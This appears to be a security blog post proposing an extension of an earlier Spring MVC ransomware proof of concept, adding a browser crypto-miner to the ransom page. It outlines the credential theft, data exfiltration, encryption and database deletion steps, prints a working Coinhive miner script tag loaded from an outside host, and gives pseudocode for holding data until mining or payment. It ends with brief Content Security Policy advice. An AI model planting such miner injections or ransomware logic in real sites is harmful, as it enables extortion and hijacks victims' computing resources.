A few months back in a previous post we gave a POC for malware embedded in an enterprise Spring MVC app. Then we got to thinking, what if we pwn3d a web app with malicious code and turned the result into a self-paying crypto-currency miner? You could give the owner of the site the option to either pay the ransom or just let the mining operation complete, at which point their files get decrypted, and their life goes back to normal.
Recap: the Spring MVC POC
Our crypto miner web app extends the previous concept. So, let's first review:
Steps in the last POC:
- Checks if the library is running as part of a Spring MVC app
- Use reflection to get access to the database credentials
- When triggered log into the database copy all the data out, encrypt it, and delete the database
- Replaces all the web pages with a ransom note demanding the victim pay the ransom to decrypt and get their data back
Extending the POC with a crypto-miner
This concept takes the previous iteration and adds a miner to the operation so we can make some crypto-cash while we wait for the ransom to be delivered.
This way the miner starts as soon as the ransomware note page is loaded.
<script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.Anonymous('YOUR_SITE_KEY'); miner.start(); </script>
Option A) Don't Touch That Close Button!
while(miner.getHashesPerSecond() > 0) // show ransom note to allow decryption // else destroy data
Option B) Pay The Ransom
We can also make things more interesting by letting the user either pay the ransom and unlock the data immediately or allow the crypto miner run until the amount required by the ransomware is mined, then decrypt the data.
while (miner.getAcceptedHashes() < SOME_VAL) // keep mining // else decrypt data since we already made our money
It seems like a new ransomware called Storagecrypt may already doing a variation of this attack. Of course, site owners with good security, especially those with good Content Security Policies can avoid this kind of attack by:
- Only allowing scripts to be loaded from your site
- Optionally, only allowing scripts to be loaded from specific URL's (like google fonts)